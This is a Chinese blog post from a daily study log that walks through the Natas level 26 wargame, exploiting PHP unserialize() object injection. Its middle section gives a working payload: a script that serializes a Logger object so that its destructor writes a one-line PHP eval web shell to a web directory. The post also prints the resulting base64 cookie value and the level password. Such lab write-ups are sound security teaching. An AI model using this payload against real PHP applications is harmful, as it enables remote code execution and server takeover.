170821 WarGames-Natas(26)

最新推荐文章于 2023-05-20 11:21:52 发布
最新推荐文章于 2023-05-20 11:21:52 发布
阅读量361 收藏
点赞数
分类专栏: WarGames
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whklhhhh/article/details/77452654
版权

1625-5 王子昂 总结《2017年8月21日》 【连续第323天总结】
A. Natas26
B.
这次PHP脚本冗长,读下来也没看到什么漏洞
最后了解到unserialize()反序列化函数存在对象注入漏洞
正常的脚本中,serialize序列化函数可以将一个PHP对象转化成字符串,然后再通过unserialize反序列化函数将其还原,这样可以方便地编码对象来传递
但是这里存在漏洞,用户如果可以对unserialize的参数进行更改的话意味着可以任意向后端代码中注入一个任意对象
PHP官方文档中也提醒不要将用户生成的内容传给unserialize

在本次中,有一个类可以利用:

    class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct($file){
            // initialise variables
            $this->initMsg="#--session started--#\n";
            $this->exitMsg="#--session end--#\n";
            $this->logFile = "/tmp/natas26_" . $file . ".log";

            // write initial message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$initMsg);
            fclose($fd);
        }                       

        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }                       

        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }                       
    }

虽然脚本中没有调用Logger的函数,但是它存在__destruct析构函数,可以达到向任意位置写任意文件的目的
这样只需要构造一个对象,使其logFile为已知路径,exitMsg为恶意木马的代码,然后将其序列化,通过cookies的drawing项注入即可
payload:

<?php
class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;
        function b(){
            $this->initMsg="";
            $this->exitMsg="<?php eval(\$_GET['command']);?>";
            $this->logFile="img/p.php";
        }

}
$a = new Logger();
$a->b();
echo serialize($a);
echo "\n";
echo base64_encode(serialize($a));

?>

生成字符串:

Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czo5OiJpbWcvcC5waHAiO3M6MTU6IgBMb2dnZXIAaW5pdE1zZyI7czowOiIiO3M6MTU6IgBMb2dnZXIAZXhpdE1zZyI7czozMToiPD9waHAgZXZhbCgkX0dFVFsnY29tbWFuZCddKTs/PiI7fQ==

这样可以传入一句话木马,然后通过include或者passthru函数都可以读出密码文件了
pw:

55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ

注意,由于权限问题,logFile的位置实际上是有限定的,刚开始我试了根目录和/tmp都不行,最后在网页上发现”img/xxx”的目录有权限可写,才写入成功
https://c.runoob.com/compile/这个网站生成的字符串注入会报错,第一百多byte错误,跟另外一个网站生成的字符串对比发现’+’改成’/’就行了
C. 明日计划
NATAS

奈沙夜影
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
natas(21-27)
半夜好饿的博客
08-19 455
natas21: 本关有两个页面,一个和之前的相同,显示“You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.”,另一个好像是一个修改CSS的页面,查看第一个页面的源码,会发现和前一关相似,都是需要_SESSION[“admin”]==1才可看到下一级的密码。 加上第...
170822 WarGames-Natas(27-28)
whklhhhh的博客
08-22 733
1625-5 王子昂 总结《2017年8月22日》 【连续第323天总结】 A. Natas B.Level 27按照之前sql注入的尿性,username应该是natas28,试一下回复Wrong password确认无误 本来以为是宽字节注入,绕过mysql_real_escape_string()函数 原理是该函数对单引号等字符自动进行转义,在前边添加’\’ 单引号字符为0x27
Natas Wargame Level26 Writeup(PHP对象注入)
a_18067的博客
05-24 192
源码: <?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $logFile; private $initMsg; private $exitMsg; ...
natas26题解
lyover的博客
12-07 601
这个题涉及到PHP的class对象注入 题目贴上源码<?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $logFile; private $initMsg; private $e
网络空间安全——Wargame靶场(Natas)
最新发布
weixin_44717952的博客
05-20 1225
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
natas(level26-level34)通关(三)
tempulcc的博客
10-13 414
@[TOC](natas(level26-level34)通关详细指南(三) level26 URL:http://natas26.natas.labs.overthewire.org Username: natas26 Password: oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
natas(level15-level25)通关详细指南(二)
tempulcc的博客
09-27 941
level15 URL:http://natas15.natas.labs.overthewire.org Username:natas15 Password:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J 源码 <? /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */ if(array_key_exists("
170817 WarGames-Natas(15)
whklhhhh的博客
08-17 338
1625-5 王子昂 总结《2017年8月17日》 【连续第319天总结】 A. WarGames-Natas B. Level 15这关SQL注入明显比上一关难多了,PHP代码如下:if(array_key_exists("username", $_REQUEST)) { $link = mysql_connect('localhost', 'natas15', '<censo
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
"Natas-master"压缩包文件可能包含了一个Natas游戏解决方案的完整集合,包括了各个级别的解题思路和代码示例。玩家可以参考这些资源,结合自己的实践,加深对Web安全的理解。 总之,Natas游戏提供了一个理想的环境...
Natas-Solutions:试图解决纳塔斯问题
03-31
Natas-Solutions-master这个压缩包很可能是包含了所有Natas挑战的解答和代码实现,对学习和复习这些知识点提供了宝贵的资源。通过深入研究和实践,你可以逐步建立起牢固的Web安全基础,并为应对更复杂的安全挑战做好...
Python库 | natas-1.0.2.tar.gz
03-06
《Python库natas-1.0.2:深入探索与应用》 在IT行业中,Python是一种广泛使用的开发语言,尤其在后端开发领域,它的简洁语法和强大的库支持使其成为首选。今天我们要深入探讨的是一款名为natas的Python库,其版本为...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
Natas 幽灵王病毒的分析》
03-26
Natas 幽灵王病毒的分析》 很厉害的一个病毒分析案例
170813 WarGames-Bandit(16-24)
whklhhhh的博客
08-14 1076
1625-5 王子昂 总结《2017年8月13日》 【连续第315天总结】 A. WarGames B. Level 16这次端口未知,只知道范围分布在31000-32000中,并且要分辨出使用SSL的端口 nmap扫描命令可以完成这个任务,-p表示指定端口,-sV表示识别服务bandit16@bandit:~$ nmap -p 31000-32000 localhost -sVStart
WarGames-leviathan(0-7)
whklhhhh的博客
08-14 866
Level 0登录以后发现空空如也,提示也刻意没有 顺手find一下,发现有很多隐藏文件leviathan0@leviathan:~$ find . ./.cache ./.cache/motd.legal-displayed ./.profile ./.bashrc ./.bash_logout ./.backup ./.backup/bookmarks.html前面几个都是初始化/收尾的脚本,
170825 WarGames-Narnia(1-2)
whklhhhh的博客
08-25 571
1625-5 王子昂 总结《2017年8月25日》 【连续第326天总结】 A. WarGame-Narnia B. Level 1 int __cdecl main(int argc, const char **argv, const char **envp) { char *v3; // ST1C_4@4 if ( !getenv("EGG") ) { put
170815 WarGames-Krypton(0-6)
whklhhhh的博客
08-15 570
1625-5 王子昂 总结《2017年8月15日》 【连续第317天总结】 A. WarGames-Krypton B.Level 0提示为密码被base64加密,直接解密得到password: KRYPTONISGREATLevel 1在文件系统里摸了半天啥都没有,提示文件在/krypton中 于是重新cd /krypton/krypton1 找到README和krypton2文件
170819 WarGames-Natas(17-20)
whklhhhh的博客
08-19 548
1625-5 王子昂 总结《2017年8月19日》 【连续第321天总结】 A. Natas B. Level 17本关的源代码与level15相同,只是把echo语句注释掉了 那么很容易想到,返回值全部被隐藏的时候,使用sql时间盲注 即虽然页面没有显示,但是可以通过sleep()函数的执行与否来反馈 具体构造爆username的shellcode为:SELECT * from u
170814 WarGames-Bandit25
whklhhhh的博客
08-14 537
1625-5 王子昂 总结《2017年8月14日》 【连续第316天总结】 A. WarGames-Bandit B. Level 25提示为bandit26使用的不是/bin/bash,直接提供了ssh key,很容易登录 但是登录以后显示了一大段东西就退出了 查看/etc/passwd文件,该文件保存了各用户的id、目录和shellbandit26:x:11026:11026:ba
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值